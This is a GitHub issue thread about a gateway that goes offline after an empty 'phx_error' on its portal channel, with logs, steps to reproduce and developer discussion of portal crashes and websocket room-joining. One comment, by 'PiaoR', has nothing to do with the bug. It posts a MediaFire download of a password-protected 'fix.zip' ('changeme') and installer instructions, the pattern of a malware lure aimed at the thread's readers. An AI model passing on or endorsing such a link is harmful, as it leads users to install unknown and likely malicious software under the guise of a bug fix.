### ISSUE TITLE
Gateway gets knocked offline soon after initializing due to empty `phx_error` for the `gateway` topic

### ISSUE THREAD

**Issue by jamilbk** [CloudFire-LLC/cloudfire#6466]
I think this is related to the Internet resource. Unfortunately the error is nonexistent and there is no error Log in GCP.

```
2024-08-28T06:09:04.738455Z TRACE wire::api::recv: {"event":"phx_error","ref":null,"topic":"gateway","payload":{}}
2024-08-28T06:09:04.738490Z DEBUG phoenix_channel: Received empty error response reference=None topic="gateway"
```

When this happens, the Gateway goes offline (from the Portal's perspective) and requires a reboot to come back online.

Steps to reproduce:

- Start with the Gateway offline (`docker stop gateway` on AWS)
- Sign into a client that has the Internet Resource enabled for this site/gateway (e.g. AWS staging Gateway)
- Start the Gateway (`docker start gateway`)
- Watch the logs. After a few seconds, a packet from the Client will inevitably create a connection intent for the Internet Resource at which point the portal websocket dies with the above error. The Gateway is now in a zombie state.

My theory is that this happens if the connection intent for the Internet Resource reaches the Gateway _before_ any other Resource's connection intent.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thomaseizinger** [comment]
> When this happens, the Gateway goes offline (from the Portal's perspective) and requires a reboot to come back online.

We stay online when this happens: https://github.com/firezone/firezone/blob/ea33b7868f7944b128336f8888e20c3c3230d964/rust/phoenix-channel/src/lib.rs#L516

I am guessing the portal phoenix process crashes and thus it shows as offline.

**Comment by thomaseizinger** [comment]
> We stay online when this happens:

Maybe we should hardfail on that instead? Or reconnect to the portal?

**Comment by jamilbk** [comment]
> > We stay online when this happens:
> 
> Maybe we should hardfail on that instead? Or reconnect to the portal?

Yeah I think this has been discussed before - this will happen anytime there's an error in the channel proc that doesn't bring down the socket.

If it's not harmful, you could detect `phx_error` and restart the portal connection. Seems like that logic should be in the portal though right?

**Comment by AndrewDryga** [comment]
There is a logged error for this, will push a fix in a minute.

**Comment by thomaseizinger** [comment]
> > > We stay online when this happens:
> > 
> > 
> > Maybe we should hardfail on that instead? Or reconnect to the portal?
> 
> Yeah I think this has been discussed before - this will happen anytime there's an error in the channel proc that doesn't bring down the socket.
> 
> If it's not harmful, you could detect `phx_error` and restart the portal connection. Seems like that logic should be in the portal though right?

Yeah. From the client's perspective, the difference between "having a websocket connection" and "being part of all the right rooms to receive / send messages" is kind of annoying.

In an ideal world, as the client, I want to make a websocket connection and send / receive messages and not do any of this room-joining business. Is there a way we could make this implicit? Like, could I pass a list of rooms in the query parameter and automatically join these? Also, it would be really useful to kill the websocket connection as soon as I am no longer part of any of these rooms.
